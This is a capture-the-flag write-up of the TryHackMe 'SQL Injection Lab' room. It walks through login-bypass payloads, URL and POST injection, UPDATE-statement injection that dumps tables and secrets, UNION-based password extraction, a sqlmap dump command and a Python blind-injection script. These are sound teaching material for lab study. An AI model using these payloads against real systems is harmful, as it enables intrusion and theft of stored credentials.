SQL INJECTION LAB
By Riteshpuvvada This is a writeup of Tryhackme room “SQL Injection Lab”
INTRODUCTION
Enumeration
Basic Nmap scan
Checking on port 5000
Introduction to SQL injection: Part 1
Input Box Non-String
We have to bypass the login to retrieve the flag for Question 1
As we know there is no input sanitization here we can perform a simple injection to login. We can use any type of true condition in the profileID field to bypass this login page. For example, we can use 1 or 1=1-- -
We bypassed the login with simple SQL injection
Input Box String
On this login page, the input field profileID expects a string. We can change the above payload to 1' or '1'='1'-- -
We bypassed the login page
URL injection
In this challenge, we can’t inject directly into the user input field because client-side controls have been implemented
Viewing the page source we found a javaScript code
Here we can’t input the special characters because the above script will be blocking us and it will pop up with an alert message. We can bypass this page with URL injection
http://10.10.142.137:5000/sesqli3/login?profileID=-1' or 1=1-- -&password=aFrom the above payload, we can bypass the javaScript validation and we can login
POST injection
In this challenge, it uses the HTTP POST method we can’t able to inject our payload in both URL and user input fields. So, with the help of the burp suite, we can remove or disable the JavaScript validation
We can disable JavaScript in the Options tab
By selecting that option we can remove the JavaScript. So, it is easy to inject our payload
When we forward this it will bypass JavaScript and our payload will get executed
Introduction to SQL injection: Part 2
SQL injection attack on UPDATE statement
They gave login credentials
profileID : 10
Password : toor
In the Edit Profile tab, we have an option to update Nickname, E-mail, and Password. Viewing the source code
By this, we can able to touch and read the database let’s test with a payload by injecting in the E-mail field
asd',nickname='test',email='test
It worked! So this is vulnerable. Now let’s dig deep to reach the database. First, we need to check what database this application is using
#MySQL and MSQL
',nickName=@@vesrion,email='
#For Oracle
',nickName=(SELECT banner FROM v$vesrion),email='
#For SQLite
',nickName=sqlite_version(),email='
This application is using SQLite 3.22.0 database
With the help of group_concat() function we can dump all the tables.
So, The query will be
',nickName=(SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'),email='
When we executed the above query we can see that there are two tables. To view all column names in the above tables the query is
',nickName=(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='usertable'),email='
Found all column names
In this challenge, the flag is hidden in the secrets table. Let’s extract all the data
The query to look at the columns
',nickName=(SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='secrets'),email='
There are three columns to view the complete data we can use this query
',nickName=(SELECT group_concat(id || "," || author || "," || secret) from secrets),email='
Vulnerable Startup: Broken Authentication
String concatenation becomes the most common mistake that leads to SQL injection vulnerability without the input sanitization the user can make the database interpret. The following query can bypass ' OR 1=1-- -
Vulnerable Startup: Broken Authentication 2
Still, the application is vulnerable
When I logged in there is no flag, Then I started inspecting the application I found a cookie with the help https://www.kirsle.net/wizards/flask-session.cgi I decoded the cookie
It is possible to dump the passwords by using a UNION based SQL Injection
1' UNION SELECT NULL-- -
1' UNION SELECT NULL, NULL-- -
1' UNION SELECT NULL, NULL, NULL-- -By injecting the following payload into the username field we can retrieve the hidden flag inside the database
' UNION SELECT 1, group_concat(password) FROM users-- -
Vulnerable Startup: Broken Authentication 3 (Blind Injection)
We can bypass this challenge in two ways
- With the help of sqlmap
sqlmap -u http://x.x.x.x:5000/challenge3/login --data="username=admin&password=admin" --level=5 --risk=3 --dbms=sqlite --technique=b --dump
- The easiest way is the python script available in Downloads tab
#!/usr/bin/python3
import sys
import requests
import stringdef send_p(url, query):
payload = {"username": query, "password": "admin"}
try:
r = requests.post(url, data=payload, timeout=3)
except requests.exceptions.ConnectTimeout:
print("[!] ConnectionTimeout: Try to adjust the timeout time")
sys.exit(1)
return r.textdef main(addr):
url = f"http://{addr}/challenge3/login"
flag = ""
password_len = 38
# Not the most efficient way of doing it...
for i in range(1, password_len):
for c in string.ascii_lowercase + string.ascii_uppercase + string.digits + "{}":
# Convert char to hex and remove "0x"
h = hex(ord(c))[2:]
query = "admin' AND SUBSTR((SELECT password FROM users LIMIT 0,1)," \
f"{i},1)=CAST(X'{h}' AS TEXT)--"resp = send_p(url, query)
if not "Invalid" in resp:
flag += c
print(flag)
print(f"[+] FLAG: {flag}")if __name__ == "__main__":
if len(sys.argv) == 1:
print(f"Usage: {sys.argv[0]} MACHINE_IP:PORT")
sys.exit(0)
main(sys.argv[1])
Usage: python3 challenge3-exploit.py MACHINE_IP:5000
